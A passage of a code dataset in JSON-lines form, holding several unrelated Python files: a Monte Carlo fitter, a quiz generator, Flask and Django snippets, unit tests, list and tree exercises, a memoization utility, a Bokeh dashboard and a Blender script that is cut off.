power = - (\n self.__image.size\n * ((difference**2).sum() / (2*variance)) / difference.size\n - 0.5 * self.__image.size * log(2 * pi * variance)\n )\n if difference.size == 0 or variance == 0 or isnan(power):\n # print('Zero Parameters:', self.__parameters[index])\n self.request_face(self.__generate_face_parameters(), index)\n return\n self.__differences[index] = power\n if None not in self.__differences:\n self.__calculate_result()\n\n # if self.__differences.count(None) % 1000 == 0 \\\\\n # and self.__differences.count(None) < len(self.__differences):\n # params = [p for d, p in zip(self.__differences,\n # self.__parameters) if d is not None]\n # tmp = [(d, p) for d, p in zip(\n # self.__get_probabilities(self.__differences), params)]\n # self.__get_iterations_count(tmp)\n\n def __calculate_result(self):\n \"\"\"Get weighted sum of achieved parameters.\n\n Normalize probabilities as their sum should be 1.\n Then get sum of parameters got during iterations\n multiplied by corresponding probabilities.\n\n Form parameters of final face and finish the fitting procedure.\n \"\"\"\n max_difference = max(self.__differences)\n normalized_differences = array(self.__differences) - float(\n sum(Decimal(diff - max_difference).exp()\n for diff in self.__differences).ln())\n params = [\n sum(\n Decimal(float(p[i]))*Decimal(diff).exp()\n for diff, p in zip(normalized_differences, self.__parameters))\n for i in self.__estimating_parameters]\n parameters = self._initial_face.as_array\n parameters[self.__estimating_parameters] = params\n self.finish(Face.from_array(parameters))\n\n def __get_iterations_count(self, values):\n \"\"\"Estimate number of iterations.\n\n Calculate how much iterations needed with current variance\n to be 99% sure that relative error is not greater than 0.1.\n \"\"\"\n average = sum(p * Decimal(float(v[0])) for p, v in values)\n variance = (sum(p * (Decimal(float(v[0]))**2) for p, v in values)\n - mean**2)\n\n z = Decimal('2.575')**2\n epsilon = Decimal('0.01')**2\n\n return (z * variance / epsilon) / average\n\n def __get_probabilities(self, differences):\n \"\"\"Get normalized probabilities.\"\"\"\n normalizator = sum(Decimal(d).exp()\n for d in differences if d is not None).ln()\n return [(Decimal(d) - normalizator).exp()\n for d in differences if d is not None]\n\n def __generate_face_parameters(self):\n \"\"\"Generate random face.\n\n Based on needed parameters to iterate by and initial Face.\n \"\"\"\n parameters = self._initial_face.as_array\n parameters[self.__iterating_parameters] = randn(\n len(self.__iterating_parameters))\n self.__parameters.append(parameters)\n self.__differences.append(None)\n self.__values.append(None)\n return Face.from_array(parameters)\n","sub_path":"src/fitter/MonteCarloFitter.py","file_name":"MonteCarloFitter.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"11217499","text":"# future upgrade\n\n# use in the new method, the enum instead of using if\n\nfrom random import randrange\n\nclass QA:\n\n\tdef new(rand_val=None):\n\n\t\trand_val = randrange(0,7)\n\t\t\n\t\tif rand_val == 0:\n\t\t\ta = randrange(4,60)\n\t\t\tquestion = \"question is {}/2\".format(a*2)\n\t\t\tanswer = a\n\t\telif rand_val == 1:\n\t\t\ta,b = (randrange(1,40),randrange(1,30))\n\t\t\tquestion = \"question is {} - {}\".format(a,b)\n\t\t\tanswer = a-b\n\t\telif rand_val == 2:\n\t\t\ta,b = randrange(2, 9),randrange(2, 12)\n\t\t\tquestion = \"question is {} x {}\".format(a,b)\n\t\t\tanswer = a*b\n\t\telif rand_val == 3:\n\t\t\tanswer = randrange(1,21)\n\t\t\tquestion = str(answer)\n\t\t\tif randrange(100) < 70:\n\t\t\t\tnumbers = [randrange(1, 17) for _ in range(randrange(2,6))]\n\t\t\t\tquestion = 'The question is: ' + ' + '.join(map(str, numbers))\n\t\t\t\tanswer = sum(numbers)\n\t\t\telse:\n\t\t\t\tnumbers = [randrange(1, 17) for _ in range(randrange(2,6))]\n\t\t\t\tquestion = 'The question is: ' + ' - '.join(map(str, numbers))\n\t\t\t\tnumbers = [numbers[idx]*-1 if idx>0 else numbers[idx] for idx,i in enumerate(numbers)]\n\t\t\t\tanswer = sum(numbers)\n\t\telif rand_val == 4:\n\t\t\ta = randrange(20,60) * randrange(25,55) * randrange(2,15)\n\t\t\tb = randrange(25,50) * randrange(15,65) * randrange(2,10)\n\t\t\tquestion = \"question is {} + {}\".format(a,b)\n\t\t\tanswer = a+b\n\t\telse: #ok\n\t\t\ta,b = randrange(1,120), randrange(1,80)\t\n\t\t\tquestion = \"question is {} + {}\".format(a,b)\n\t\t\tanswer = a+b\n\t\treturn question,answer","sub_path":"que_ans.py","file_name":"que_ans.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"14119875","text":"from flask import Flask, g, current_app\nfrom config import Config\nfrom namex import db\n\n\ndef create_app(config=Config):\n app = Flask(__name__)\n app.config.from_object(config)\n db.init_app(app)\n app.app_context().push()\n current_app.logger.debug('created the Flask App and pushed the App Context')\n\n @app.teardown_appcontext\n def shutdown_session(exception=None):\n ''' Enable Flask to automatically remove database sessions at the\n end of the request or when the application shuts down.\n Ref: http://flask.pocoo.org/docs/patterns/sqlalchemy/\n '''\n current_app.logger.debug('Tearing down the Flask App and the App Context')\n if hasattr(g, 'ora_conn'):\n g.ora_conn.close()\n\n return app\n","sub_path":"jobs/missing-coprs/nro/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"257964798","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport unittest, os, os.path, sys, shutil\nimport kvstorelocal\n\nclass KVStoreLocal_Test (unittest.TestCase):\n\tdef setUp (self):\n\t\tif os.path.exists (\"sandbox\"):\n\t\t\tshutil.rmtree (\"sandbox\")\n\t\tos.makedirs (\"sandbox/tmp\")\n\t\tself.store = kvstorelocal.KVStoreLocal (path=\"sandbox/tmp\")\n\n\tdef test_text (self):\n\t\tk = u\"this is a key string\"\n\t\tv = u\"this is value text\\nlet's goto the school.\\nfin.\"\n\t\tself.assertTrue (self.store.set_text (k, v))\n\t\tself.assertEqual (self.store.get_text (k), v)\n\n\tdef test_json (self):\n\t\tk = u\"this is a key string for json value\"\n\t\tv = {\n\t\t\t\"json\" : {\n\t\t\t\t\"users\" : [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"name\" : \"foo\",\n\t\t\t\t\t\t\"pass\" : \"1234\",\n\t\t\t\t\t\t\"age\" : 5,\n\t\t\t\t\t\t\"description\" : u\"foo is a bear.\"\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"name\" : \"bar\",\n\t\t\t\t\t\t\"pass\" : \"\\12\\34\\56\\78\",\n\t\t\t\t\t\t\"age\" : 1,\n\t\t\t\t\t\t\"description\" : \"bar is a honey.\"\n\t\t\t\t\t}\n\t\t\t\t],\n\t\t\t\t\"departments\" : [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"name\" : \"animals likes honey\",\n\t\t\t\t\t\t\"consist of\" : [\n\t\t\t\t\t\t\t\"foo\",\n\t\t\t\t\t\t\t\"bar\"\n\t\t\t\t\t\t]\n\t\t\t\t\t}\n\t\t\t\t]\n\t\t\t}\n\t\t}\n\t\tself.assertTrue (self.store.set_json (k, v))\n\t\tself.assertEqual (self.store.get_json (k), v)\n\n\tdef test_binary (self):\n\t\tk = u\"this is a key string for binary value\"\n\t\tv = \"\"\n\t\tif sys.platform == \"win32\":\n\t\t\twith open (\"/windows/system32/notepad.exe\", \"rb\") as f:\n\t\t\t\tv = f.read ()\n\t\telse:\n\t\t\twith open (\"/bin/bash\", \"rb\") as f:\n\t\t\t\tv = f.read ()\n\t\tself.assertTrue (self.store.set_binary (k, v))\n\t\tself.assertEqual (self.store.get_binary (k), v)\n\nif __name__ == \"__main__\":\n\tunittest.main ()\n","sub_path":"tests/kvstorelocal_test.py","file_name":"kvstorelocal_test.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"437099411","text":"\"\"\"Tablice liczbowe\n\"\"\"\n\ndef add_inputed_elements(n):\n \"\"\"Adds n elements inputed by user to T table and prints it\n\n Args:\n n - number of elements to be inputed\n \"\"\"\n T = []\n p = 0\n while n!=0:\n element = input(\"Podaj wartość liczbową: \")\n T.append(element)\n p += 1\n n -= 1\n print(T)\n\n\ndef how_many_even_in_table(T):\n \"\"\"Checks how many even numbers are in a table\n\n Args:\n T - a table of numbers\n \"\"\"\n n = len(T) - 1\n p = 0\n while n != -1:\n if T[n]:\n if T[n] % 2 == 0:\n p += 1\n n -=1\n print(p)\n\n\ndef table_sum(T):\n \"\"\"Calculates sum of elements of a table\n\n Args:\n T - Table of numbers\n \"\"\"\n n = len(T) - 1\n suma = 0\n while n != -1:\n suma = suma + T[n]\n n -= 1\n print(suma)\n\n\ndef smallest_element(T):\n \"\"\"Finds smallest element of the table\n\n Args:\n T - Table of numbers\n \"\"\"\n n = len(T) - 1\n smallest_element = T[n]\n while n != 0:\n n -= 1\n if smallest_element > T[n]:\n smallest_element = T[n]\n print(smallest_element)\n\n\ndef smallest_and_biggest_element(T):\n \"\"\"Finds smallest and biggest elements of the table\n\n Args:\n T - Table of numbers\n \"\"\"\n n = len(T) - 1\n smallest_element = T[n]\n biggest_element = T[n]\n while n != 0:\n n -= 1\n if smallest_element > T[n]:\n smallest_element = T[n]\n if biggest_element < T[n]:\n biggest_element = T[n]\n\n print(smallest_element)\n print(biggest_element)\n\n\n\nif __name__ == '__main__':\n smallest_and_biggest_element([321,2,3,1234])\n","sub_path":"programowanie_adam/Zestaw 6.py","file_name":"Zestaw 6.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"198421193","text":"class BTNode(object):\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n \ndef build_bst_min_height(inlist):\n \n len_in = len(inlist)\n \n def _build(low, high):\n if low > high:\n return None\n mid = low + (high-low)//2\n \n subroot = BTNode(inlist[mid])\n subroot.left = _build(low, mid-1)\n subroot.right = _build(mid+1, high)\n \n return subroot\n \n root = _build(0, len_in-1)\n return root\n \ndef print_inorder(root):\n if not root: return\n node = root\n wstack = []\n \n while node or wstack:\n if node:\n wstack.append(node)\n node = node.left\n else:\n node = wstack.pop()\n print(node.val, end=\" \")\n node = node.right\n print(\"\")\n \n\n\nif __name__ == '__main__':\n inlist = [1, 3, 4, 5, 7, 8, 10, 12, 13, 15, 17]\n \n root = build_bst_min_height(inlist)\n print_inorder(root)\n \n","sub_path":"6 Trees/6-09_build_bst_from_sortedarray.py","file_name":"6-09_build_bst_from_sortedarray.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"617873955","text":"import json\nfrom django.test import TestCase\n\nfrom ..models import Product, Size\n\n\nclass ProductModelTest(TestCase):\n \"\"\"\n Test model Product (CRUD and methods)\n \"\"\"\n @staticmethod\n def create_example():\n obj = Product.objects.create(\n name='Example',\n url='http://example.com',\n kid_adult='0',\n kids='0',\n women='0',\n free_porto='0',\n price=100.15,\n price_old=100,\n package='0',\n delivery='1 day',\n img_url='http://example.com'\n )\n size = Size.objects.create(\n value='EU 34'\n )\n obj.sizes.add(size)\n obj.save()\n return obj\n\n def test_create_instance(self):\n self.assertEqual(Product.objects.count(), 0)\n obj = self.create_example()\n self.assertEqual(Product.objects.count(), 1)\n self.assertEqual(Product.objects.first().name, obj.name)\n\n def test_edit_instance(self):\n obj = self.create_example()\n obj.name = \"Boots\"\n obj.save()\n self.assertEqual(Product.objects.first().name, \"Boots\")\n\n def test_delete_instance(self):\n obj = self.create_example()\n self.assertEqual(Product.objects.count(), 1)\n obj.delete()\n self.assertEqual(Product.objects.count(), 0)\n\n def test_get_json_method(self):\n obj = self.create_example()\n self.assertEqual(json.loads(obj.get_json())['name'], 'Example')\n\n def test_get_size_method(self):\n obj = self.create_example()\n self.assertIn('EU', obj.get_sizes())\n\n\nclass SizeModelTest(TestCase):\n \"\"\"\n Test model Size (CRUD and methods)\n \"\"\"\n @staticmethod\n def create_example():\n return Size.objects.create(\n value='EU 34'\n )\n\n def test_create_instance(self):\n self.assertEqual(Size.objects.count(), 0)\n obj = self.create_example()\n self.assertEqual(Size.objects.count(), 1)\n self.assertEqual(Size.objects.first().value, obj.value)\n\n def test_edit_instance(self):\n obj = self.create_example()\n obj.value = \"50\"\n obj.save()\n self.assertEqual(Size.objects.first().value, \"50\")\n\n def test_delete_instance(self):\n obj = self.create_example()\n self.assertEqual(Size.objects.count(), 1)\n obj.delete()\n self.assertEqual(Size.objects.count(), 0)\n","sub_path":"test_app/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"619561934","text":"import hashlib\nimport os\nimport pickle\nimport struct\nfrom datetime import datetime\nfrom functools import reduce\nfrom typing import Callable\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras import Model\n\nfrom Configuration.Constants import Memoization\n\n\ndef external_hash(obj):\n if isinstance(obj,int):\n value = 0\n while obj != 0:\n value ^= int.from_bytes(hashlib.sha256((obj%65535).to_bytes(2, byteorder='big')).digest(),\"big\")\n obj //= 65535\n return value\n if isinstance(obj,float):\n return int.from_bytes(hashlib.sha256(bytearray(struct.pack(\"f\",obj))).digest(),\"big\")\n elif isinstance(obj,str):\n return int.from_bytes(hashlib.sha256(obj.encode('utf-8')).digest(),\"big\")\n elif isinstance(obj,dict):\n return external_hash(obj.items())\n elif type(obj) in [tuple,list]:\n if len(obj)==0: return 0\n return external_hash(reduce(lambda x,y : x^y,[external_hash(item) for item in obj]))\n elif isinstance(obj,Model):\n return external_hash([layer.weights for layer in obj.layers])\n #return external_hash(reduce(lambda x,y : x^y,[layer.weights for layer in obj.layers]))\n elif isinstance(obj,tf.Tensor):\n return external_hash(obj.numpy())\n elif isinstance(obj,np.ndarray):\n if reduce(lambda x,y : x*y, obj.shape)>3e8:\n print(reduce(lambda x,y : x*y, obj.shape))\n # note that the slicing is a hack and may be prone to collisions - particularly so for sparse tensors\n # you may want to eschew this conditional altogether\n # The item amount at which it triggers (30.000.000) usually takes around 10s on an i9 10750H\n\n # (this also assumes first-dimension slices are of a tractable size)\n reduction_factor = reduce(lambda x,y : x*y, obj.shape)/3e8\n first_dim_slice = np.floor(obj.shape[0]/reduction_factor).astype(int)\n obj = obj[:first_dim_slice]\n return external_hash(external_hash(obj.shape)^int.from_bytes(hashlib.sha256(obj.data.tobytes()).digest(),\"big\"))\n elif isinstance(obj,Callable):\n if obj.__name__ == \"\":\n raise Exception(\"external_hash cannot distinguish between anonymous functions\")\n return external_hash(obj.__name__)\n elif isinstance(obj,tf.python.ops.resource_variable_ops.ResourceVariable):\n return external_hash(obj.value)\n else:\n raise TypeError(\"Unimplemented external hash : {}\".format(type(obj)))\n\nMEMO_DIR = os.path.join(os.getcwd(),\"memos\")\n\ndef permanent_memo(fun):\n if Memoization.ENABLE_MEMOIZATION:\n def memoed_fun(*args):\n call_id = \"-\".join((fun.__name__,str(external_hash(args))))\n if call_id in os.listdir(MEMO_DIR):\n with open(os.path.join(MEMO_DIR,str(call_id)),\"rb\") as f:\n return_value = pickle.load(f)\n else:\n return_value = fun(*args)\n with open(os.path.join(MEMO_DIR,str(call_id)),\"wb\") as f:\n pickle.dump(return_value,f)\n return return_value\n memoed_fun.__name__ = fun.__name__\n return memoed_fun\n\n else:\n return fun\n\n\ndef timed(f):\n f_name = f.__name__\n def timed_f(*args, **kwargs):\n execution_start = datetime.now()\n return_value = f(*args,**kwargs)\n execution_end = datetime.now()\n print(\"Function {} ran for {}\".format(f_name,execution_end-execution_start))\n return return_value\n return timed_f\n\n\nclass SingleUseMethod:\n \"\"\"\n Used as a decorator. Ensures a None method is only executed once\n (this could probably be implemented more briefly w/ closures, but would likely be hacky)\n \"\"\"\n def __init__(self,function):\n self.function = function\n self.__name__ = function.__name__\n self.has_been_run = False\n def __call__(self,*args,**kwargs):\n print(self)\n print(*args)\n print(**kwargs)\n if self.has_been_run: return None\n self.has_been_run = True\n self.function(*args,**kwargs)\n\n\ndef single_use_method(method):\n \"\"\"\n Used as a decorator. Ensures a None method is only executed once\n hack\n \"\"\"\n attribute_name = \"{}_has_been_run\".format(method.__name__)\n\n def single_use(self, *args, **kwargs):\n try:\n getattr(self, attribute_name)\n except AttributeError:\n setattr(self, attribute_name, True)\n method(self, *args, **kwargs)\n\n single_use.__name__ = \"single_use_{}\".format(method.__name__)\n return single_use\n\n\nif __name__==\"__main__\":\n from time import sleep\n\n @permanent_memo\n def hm(a, b):\n sleep(3)\n return a + b\n\n @permanent_memo\n def hmmmm(a, b):\n sleep(3)\n return a - b\n\n print(hm(7,4))\n print(hmmmm(7,4))\n","sub_path":"NeurIPSSoftware/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"24702381","text":"\"\"\"Loop through lines in column objects and trigger line operator class instances appropriately.\"\"\"\n\nimport xmlLineOperator\nimport xmlStaticOperators\n\nclass xmlColumnOperator(object):\n\n def __init__(self, index, dictionary, page, year, file_path, page_data, search_key_data):\n\n self.index = index\n self.dictionary = dictionary\n self.page = page\n self.year = year\n self.file_path = file_path\n\n self.page_data = page_data\n self.search_key_data = search_key_data\n self.page_break_dictionary_teilweise = self.list_operate()\n\n def list_operate(self):\n \"\"\"Plot words on page/figure.\"\"\"\n\n def write_from_list(file_path, list_name, delimiter):\n \"\"\"Write list element to newline-delimited .txt file.\"\"\"\n\n with open(file_path, 'a') as temporary_file:\n temporary_file = temporary_file.write(delimiter.join(list_name))\n\n page_break_dictionary_teilweise = {}\n dictionary_as_list = list(self.dictionary.items())[::-1]\n for i, word_list in enumerate(dictionary_as_list):\n present_line = xmlLineOperator.xmlLineOperator(self.index, dictionary_as_list[i],\n self.page_data, self.search_key_data, False)\n\n if present_line.company_name_found == 'Undefined' and i < (len(dictionary_as_list) - 1):\n next_line = xmlLineOperator.xmlLineOperator(self.index, dictionary_as_list[i+1],\n self.page_data, self.search_key_data, True)\n\n for word in next_line.captured_words:\n present_line.captured_words.append(word)\n\n if self.index in page_break_dictionary_teilweise.keys() and len(present_line.captured_words) > 0:\n page_break_dictionary_teilweise[self.index].update({max([word[1] for word in present_line.captured_words]): present_line.captured_words})\n\n elif len(present_line.captured_words) > 0:\n page_break_dictionary_teilweise.update({self.index: {max([word[1] for word in present_line.captured_words]): present_line.captured_words}})\n\n if len(present_line.captured_words) > 0:\n page = ['\\n', self.page, '\\n']\n words_to_save = present_line.captured_words[:]\n words_to_save.append('\\n')\n write_from_list(self.file_path, page, '')\n write_from_list(self.file_path, [word[0] for word in words_to_save], ' ')\n\n return page_break_dictionary_teilweise\n","sub_path":"text_dictionaries/xml_firm_search/codebase/xmlColumnOperator.py","file_name":"xmlColumnOperator.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"494449155","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 9 15:45:49 2021\n\n@author: yases\n\"\"\"\nfrom bokeh.models.widgets import Panel, Tabs\nfrom bokeh.models import ColumnDataSource, DataTable, TableColumn, Div, HTMLTemplateFormatter, DateRangeSlider, DateFormatter, CheckboxGroup, HoverTool, DaysTicker, RadioGroup\nfrom bokeh.layouts import column, gridplot, layout\nfrom bokeh.io import show, curdoc\nfrom bokeh.plotting import figure\nfrom bokeh.palettes import Category10_10\nimport datetime\nimport pandas as pd\n\ndef getmachinetab(df):\n\n machines = df['Machine'].unique() # for displaying radio button\n \n mx_dt = max(df.Start_Time.dt.date)\n mi_dt= min(df.Start_Time.dt.date)\n \n #color_coding\n factors_str = [\"Safety Stopped\", \"Starved\", \"Blocked\", \"Faulted\", \"Unallocated\", \"User Stopped\",\"Off\", \"Setup\",\"Running\", \"Runout\" ]\n color_dict = {}\n for x in Category10_10:\n cd = {factors_str[Category10_10.index(x)]:x}\n color_dict.update(cd)\n \n \n ##prepare line data\n def preparelinedata(df_subset):\n linedata = pd.DataFrame()\n statuses = df_subset.Status.unique()\n for status in statuses:\n d = df_subset.loc[df_subset['Status']==status]\n d['Start_Time'] = pd.to_datetime(d['Start_Time']).dt.to_period('D')\n d.set_index('Start_Time', inplace=True)\n idx = pd.period_range(min(df.Start_Time), max(df.Start_Time)).rename('Start_Time')\n d = d.reindex(idx, fill_value=0)\n d['Status'] = status\n d['Machine'] = 'Depal'\n d['Filler_Status'] = 'Blocked'\n d.reset_index(inplace=True)\n linedata = linedata.append(d, ignore_index=True)\n return linedata\n \n \n def make_lineplot(data):\n p = figure(plot_width=800, plot_height=400, x_axis_type=\"datetime\") \n statuses = data['Status'].unique()\n for status in statuses:\n d = data.loc[data['Status']==status]\n source = ColumnDataSource(d)\n p.line(x=\"Start_Time\", y=\"duration_sec\", line_width=2, source=source, color=color_dict.get(status), legend_label = status)\n \n p.legend.location = \"top_left\"\n p.legend.click_policy=\"hide\"\n \n hover = HoverTool()\n hover.tooltips = [(\"Machine\",\"@Machine\"),(\"Status\",\"@Status\"),(\"Date\",\"@Start_Time{%F}\"),(\"Stoppage Change Count\",\"@Count\"),(\"Duration of Stoppage\",\"@duration_sec{1.111} seconds\")] ## define the content of the hover tooltip\n \n hover.formatters = { \"@Start_Time\": \"datetime\"}\n p.add_tools(hover)\n \n p.xaxis.axis_label = \"Date\"\n p.yaxis.axis_label = \"Stoppage Duration in seconds\"\n p.xaxis.major_label_orientation = 3.4142/4\n \n p.xaxis.ticker = DaysTicker(days=list(range(min(df.Start_Time.dt.day),max(df.Start_Time.dt.day)+1)))\n \n p.xgrid.visible = False\n return p \n \n def make_lineplotmod(data):\n p = figure(plot_width=800, plot_height=400, x_axis_type=\"datetime\") \n for status in statuses:\n d = data.loc[data['Status']==status]\n source = ColumnDataSource(d)\n p.line(x=\"Start_Time\", y=\"duration_sec\", line_width=2, source=source, color=color_dict.get(status), legend_label = status)\n \n #d['Start_Time'] = pd.to_datetime(d['Start_Time']).dt.to_period('D')\n \n p.legend.location = \"top_left\"\n p.legend.click_policy=\"hide\"\n \n hover = HoverTool()\n hover.tooltips = [(\"Machine\",\"@Machine\"),(\"Status\",\"@Status\"),(\"Date\",\"@Start_Time{%F}\"),(\"Stoppage Change Count\",\"@Count\"),(\"Duration of Stoppage\",\"@duration_sec{1.111} seconds\")] ## define the content of the hover tooltip\n \n hover.formatters = { \"@Start_Time\": \"datetime\"}\n p.add_tools(hover)\n \n p.xaxis.axis_label = \"Date\"\n p.yaxis.axis_label = \"Stoppage Duration in seconds\"\n p.xaxis.major_label_orientation = 3.4142/4\n \n p.xaxis.ticker = DaysTicker(days=list(range(min(df.Start_Time.dt.day),max(df.Start_Time.dt.day)+1)))\n \n p.xgrid.visible = False\n return p \n ################################################################################################\n \n #make table 1\n def make_table(source):\n datefmt = DateFormatter(format=\"%a, %d %b %Y\")\n columns = [TableColumn(field=\"Start_Time\", title=\"Date\", formatter = datefmt),TableColumn(field=\"Status\", title=\"Status\"), TableColumn(field=\"Count\", title=\"Freq\"), TableColumn(field=\"duration_sec\", title=\"Duration(s)\")] \n data_table = DataTable(source=source, columns=columns, width=400, height=200, fit_columns=True)\n return data_table\n \n def maketablesource(data):\n new_start= datetime.datetime.utcfromtimestamp(date_range_slider.value[0]/1000)\n new_end = datetime.datetime.utcfromtimestamp(date_range_slider.value[1]/1000)\n status_to_use = [status_selection.labels[i] for i in status_selection.active]\n data1 = data.loc[(pd.PeriodIndex(data['Start_Time'], freq='D').to_timestamp() >= new_start) & (pd.PeriodIndex(data['Start_Time'], freq='D').to_timestamp() <= new_end)]\n data1 = data1.loc[data1.Status.isin(status_to_use)]\n return ColumnDataSource(data1)\n \n \n ################################################################################################\n \n #update filters\n def update(attr, old, new):\n new_start= datetime.datetime.utcfromtimestamp(date_range_slider.value[0]/1000)\n new_end = datetime.datetime.utcfromtimestamp(date_range_slider.value[1]/1000)\n \n \n #line\n #global linedf\n #linedf = preparelinedata(df_subset)\n data = linedf.loc[(pd.PeriodIndex(linedf['Start_Time'], freq='D').to_timestamp() >= new_start) & (pd.PeriodIndex(linedf['Start_Time'], freq='D').to_timestamp() <= new_end)]\n line_plot = make_lineplotmod(data)\n \n #table 1\n table_src = maketablesource(df_subset)\n data_table1 = make_table(table_src)\n \n #the layout\n rt = column(status_selection, date_range_slider)\n ly = layout([[radio_group],[line_plot],[rt,data_table1]])\n col = column(children=[ly], name='main_column')\n # curdoc().remove_root(curdoc().roots[1])\n curdoc().add_root(col)\n \n \n ################################################################################################\n \n #radio button on update change document content\n def updatedf(new):\n global df_subset\n #values for df\n df_subset = df[df.Machine == machines[new]]\n \n #for check box\n global statuses\n statuses = df_subset['Status'].unique()\n available_statuses = list(statuses)\n global status_selection\n status_selection = CheckboxGroup(labels=available_statuses, active = list(range(len(available_statuses))))\n status_selection.on_change(\"active\", update)\n \n #date range slider\n global date_range_slider\n new_start= datetime.datetime.utcfromtimestamp(date_range_slider.value[0]/1000)\n new_end = datetime.datetime.utcfromtimestamp(date_range_slider.value[1]/1000)\n date_range_slider = DateRangeSlider(value=(new_start, new_end),start=mi_dt, end=mx_dt, step=1*24*60*60*1000)\n date_range_slider.on_change(\"value\", update)\n \n #lineplot\n global linedf\n linedf = preparelinedata(df_subset)\n data = linedf.loc[(pd.PeriodIndex(linedf['Start_Time'], freq='D').to_timestamp() >= new_start) & (pd.PeriodIndex(linedf['Start_Time'], freq='D').to_timestamp() <= new_end)]\n line_plot = make_lineplot(data)\n \n #table 1\n table_src = maketablesource(df_subset)\n data_table1 = make_table(table_src)\n \n #the layout\n rt = column(status_selection, date_range_slider)\n ly = layout([[radio_group],[line_plot],[rt,data_table1]])\n #curdoc().remove_root(curdoc().roots[1])\n col = column(children=[ly], name='main_column')\n curdoc().add_root(col)\n \n ##################################################################################################\n \n #radio button\n radio_group = RadioGroup(labels=list(machines), active=0, inline=True)\n radio_group.on_click(updatedf)\n \n #initial values\n df_subset = df[df.Machine == machines[0]]\n linedf = preparelinedata(df_subset)\n \n ## check box for machine status\n statuses = df_subset['Status'].unique()\n available_statuses = list(statuses)\n status_selection = CheckboxGroup(labels=available_statuses, active = list(range(len(available_statuses))))\n status_selection.on_change(\"active\", update)\n \n #date slider\n date_range_slider = DateRangeSlider(value=(mi_dt, mx_dt),start=mi_dt, end=mx_dt, step=1*24*60*60*1000)\n date_range_slider.on_change(\"value\", update)\n \n #lineplot\n line_plot = make_lineplot(linedf)\n \n #table 1\n table_src = maketablesource(df_subset)\n data_table1 = make_table(table_src)\n \n rt = column(status_selection, date_range_slider)\n ly = layout([[radio_group],[line_plot],[rt,data_table1]])\n \n col = column(children=[ly], name='main_column')\n curdoc().add_root(col)\n \n return Panel(child = ly, title = \"Machines\" )\n\ndef getoveralldetails(df):\n \n m=df.groupby(['Filler_Status','Machine','Status']).sum().reset_index()\n m['duration_sec'] = round(m['duration_sec'],3)\n \n def const_d_table(data, machine):\n data = data.loc[data.Status != \"Running\"]\n max_value_index = data.index[data['duration_sec']==data['duration_sec'].max()]\n sts = data['Status'][max_value_index]\n source = ColumnDataSource(data)\n template=\"\"\" \n
;\"> \n <%= value %>\n
\n \"\"\"\n formatter = HTMLTemplateFormatter(template=template)\n columns = [TableColumn(field=\"Status\", title=\"Status\", formatter=formatter), TableColumn(field=\"Count\", title=\"Freq\", formatter=formatter), TableColumn(field=\"duration_sec\", title=\"Duration(s)\", formatter=formatter)] \n data_table = DataTable(source=source, columns=columns, width=275, height=200, fit_columns=True)\n div = Div(text=\"\"\"\"\"\"+machine+\"\"\" Details\"\"\")\n return (column(div, data_table))\n\n machines = df.Machine.unique()\n table_list = []\n for machine in machines:\n ndf = m.loc[m.Machine == machine]\n table_list.append(const_d_table(ndf,machine))\n \n grid = gridplot(table_list, ncols=3)\n div = Div(text=\"\"\" Overall Details\"\"\",style={'font-size': '200%', 'color': 'blue'})\n g = column(div, grid)\n \n return Panel(child = g, title=\"Overall Details\")\n \n \n \n \n \n","sub_path":"Figures/dash_subtabs.py","file_name":"dash_subtabs.py","file_ext":"py","file_size_in_byte":11180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"475220592","text":"\nimport bpy\nimport math\nfrom math import pi\n\ndef removeObjects( scn ):\n for ob in scn.objects:\n if (ob.type == 'FONT') or (ob.type == 'MESH'):\n scn.objects.unlink( ob )\n \nscn = bpy.context.scene\nremoveObjects( scn )\n\nfnt = bpy.data.fonts.load('C:\\\\Windows\\\\Fonts\\\\Impact.ttf')\n\ndef makeMaterial(name, diffuse, specular, alpha):\n mat = bpy.data.materials.new(name)\n mat.diffuse_color = diffuse\n mat.diffuse_shader = 'LAMBERT'\n mat.diffuse_intensity = 1.0\n mat.specular_color = specular\n mat.specular_shader = 'COOKTORR'\n mat.specular_intensity = 0.5\n mat.alpha = alpha\n mat.ambient = 1\n return mat\n\ndef setMaterial(ob, mat):\n me = ob.data\n me.materials.append(mat)\n \nred = makeMaterial('Red', (1, 0, 0), (1, 1, 1), 1)\nblue = makeMaterial('BlueSemi', (0, 0, 1), (1, 1, 1), 0.5)\ngreen = makeMaterial('GreenSemi', (0, 1, 0), (1, 1, 1), 0.5)\nyellow = makeMaterial('YellowSemi', (1, 1, 0), (1, 1, 1), 0.5)\n\n# Create and name TextCurve object #1\nbpy.ops.object.text_add(\nlocation=(0, 4, 0),\nrotation=(0,0,0))\nob = bpy.context.object\nob.name = 'Text1'\n# TextCurve attributes\nob.data.name = 